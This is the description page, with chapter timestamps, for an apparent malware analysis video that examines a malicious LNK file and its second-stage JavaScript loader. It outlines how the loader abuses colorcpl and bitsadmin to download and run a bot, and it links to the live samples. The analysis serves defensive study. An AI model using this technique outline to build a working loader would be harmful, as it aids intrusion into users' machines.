Malicious Lnk and JavaScript Analysis
Malware Bazaar diving video. I'll look at a lnk file and associated JavaScript file. Interesting stage two JS that uses colorcpl to move bitsadmin into the color directory, and then uses it to download many files and execute the bot. The tags on Malare Bazaar flag this as loading the Guildma botnet (I offer no insight to the validity of that). A fun piece of malware with some interesting rabbit holes looking at bitsadmin and colorcpl.
Sample lnk: https://bazaar.abuse.ch/sample/3e5c83...
Sample js: https://bazaar.abuse.ch/sample/ea6215...
FireEye / Mandiant red_team_tool_countermeasures: https://github.com/mandiant/red_team_...
eral4m colorcpl tweet: / 1480468728324231172
LnkParse3: https://github.com/Matmaus/LnkParse3
☕ Buy Me A Coffee: https://www.buymeacoffee.com/0xdf
[00:00] Introduction
[00:40] Looking at Malware Bazaar
[01:36] Quick look at lnk in Windows
[02:27] lnkparse
[03:44] %comspec%
[04:17] Analysis of lnk target
[06:13] Decoded JS
[07:58] Failing to download stage 2 JS
[08:21] Overview of stage 2 JS
[10:46] First function, fromCharCode
[11:07] Second function, download_to_file
[15:01] Understanding bitsadmin.exe /transfer
[16:12] Third function, inc counter
[16:43] Forth function, main
[19:25] colorcpl.exe exploration
[23:27] File downloads and execution in main
[24:29] Next stage exploration
[25:11] Conclusion
Смотрите видео Malicious Lnk and JavaScript Analysis онлайн без регистрации, длительностью часов минут секунд в хорошем качестве. Это видео добавил пользователь 0xdf 09 Март 2023, не забудьте поделиться им ссылкой с друзьями и знакомыми, на нашем сайте его посмотрели 1,539 раз и оно понравилось 67 людям.